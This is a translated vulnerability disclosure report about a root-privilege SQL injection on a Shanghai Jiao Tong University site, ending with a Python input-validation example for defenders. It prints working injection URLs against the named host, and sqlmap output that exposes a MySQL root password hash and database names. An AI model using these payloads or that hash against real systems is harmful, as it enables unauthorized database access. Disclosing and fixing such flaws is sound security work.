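2015-02-02: Details reported to the vendor; awaiting vendor handling
2015-02-02: Vendor confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and experts in related fields
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-19: Details disclosed to the public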
Root-privilege SQL injection on a Shanghai Jiao Tong University site, affecting multiple databases
A ThinkPHP injection. Security can't rely on the framework; it mainly depends on the programmer.
Site: oe.sjtu.edu.cn
http://oe.sjtu.edu.cn/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703

Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703 AND 3661=3661

    Type: UNION query
    Title: MySQL UNION query (NULL) - 19 columns
    Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/-3770 UNION ALL SELECT NULL,CONCAT(0x3a63756a3a,0x426f486a544f565067,0x3a6962773a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULNULL,NULL,NULL,NULL,NULL,NULL#
---
[00:50:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.17
back-end DBMS: MySQL 5
[00:50:36] [INFO] fetching database users
[00:50:37] [INFO] the SQL query used returns 25 entries
[00:50:37] [INFO] retrieved: "'root'@'localhost'"
[00:50:37] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:40] [INFO] retrieved: "'root'@'localhost'"
[00:50:40] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
database management system users [1]:
[*] 'root'@'localhost'
[00:50:45] [INFO] fetching database users password hashes
[00:50:46] [INFO] the SQL query used returns 1 entries
[00:50:46] [INFO] writing hashes to file 'c:\docume~1\admini~1\locals~1\temp\sqlmaphashes-ox6ete.txt' for eventual further processing with other tools
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[00:50:56] [INFO] fetching database names
[00:50:57] [INFO] the SQL query used returns 5 entries
[00:50:57] [INFO] retrieved: "information_schema"
[00:50:57] [INFO] retrieved: "jd"
[00:50:58] [INFO] retrieved: "mysql"
[00:50:58] [INFO] retrieved: "skl"
[00:50:58] [INFO] retrieved: "test"
available databases [5]:
[*] information_schema
[*] jd
[*] mysql
[*] skl
[*] test
The developers will know what to do.
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-02-02 15:21
Thank you, we will handle it immediately!
None yet
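
The report's point that the framework alone does not make the path parameters safe can be shown as an input gate. The following is an added example, not code from the report or from ThinkPHP: it parses the key/value path style seen in the URLs above and rejects any id parameter that is not a plain integer. The function names and the assumption that parentID, cat_id and artID are all non-negative integer ids are hypothetical.

```python
import re
from urllib.parse import unquote

# Assumption: all three parameters from the report's URLs are non-negative integer ids.
INT_PARAMS = ("parentID", "cat_id", "artID")
_INT_RE = re.compile(r"\d{1,10}", re.ASCII)


def parse_pathinfo(path, depth=3):
    """Split /index.php/Module/controller/action/k1/v1/... into {k: v}.

    depth is the number of routing segments before the key/value pairs;
    3 matches the URLs shown in the report.
    """
    path = unquote(path.split("?", 1)[0])
    _, sep, tail = path.partition("/index.php/")
    if not sep:
        return {}
    segs = tail.split("/")[depth:]
    if len(segs) % 2:  # trailing key without a value
        segs.append("")
    return dict(zip(segs[0::2], segs[1::2]))


def bad_int_params(path):
    """Names of integer parameters whose value is not a plain integer."""
    params = parse_pathinfo(path)
    return sorted(k for k in INT_PARAMS
                  if k in params and not _INT_RE.fullmatch(params[k]))


def safe_int_params(path):
    """Handler-side gate: return {name: int} or raise ValueError."""
    bad = bad_int_params(path)
    if bad:
        raise ValueError("non-integer value for: " + ", ".join(bad))
    params = parse_pathinfo(path)
    return {k: int(params[k]) for k in INT_PARAMS if k in params}


# Constructed sample request paths, modelled on the URLs in the report.
SAMPLES = [
    "/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703",
    "/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703%20AND%203661=3661",
    "/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/-3770%20UNION%20ALL%20SELECT%20NULL",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(bad_int_params(s) or "ok", s)
```

The same check can be run over access-log request paths to find past requests that carried non-integer ids. Values that pass the gate should still be bound as query parameters rather than concatenated into SQL.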